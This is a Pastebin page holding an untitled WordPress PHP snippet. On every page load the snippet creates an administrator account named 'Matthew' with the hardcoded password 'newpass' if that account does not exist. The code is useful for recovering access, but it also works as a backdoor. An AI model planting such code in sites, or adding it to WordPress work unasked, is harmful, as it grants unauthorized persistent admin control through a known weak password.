Advertisement
Guest User

Untitled

a guest
Nov 19th, 2016
111
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.28 KB | None | 0 0
  1. <?php
  2. add_action('init', function() {
  3. $username = 'Matthew';
  4. $password = 'newpass';
  5. $email = 'matt@example.com';
  6.  
  7. if (!username_exists($username)) {
  8. $user_id = wp_create_user($username, $password, $email);
  9. $user = new WP_User($user_id);
  10. $user->set_role('administrator');
  11. }
  12. });
  13. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement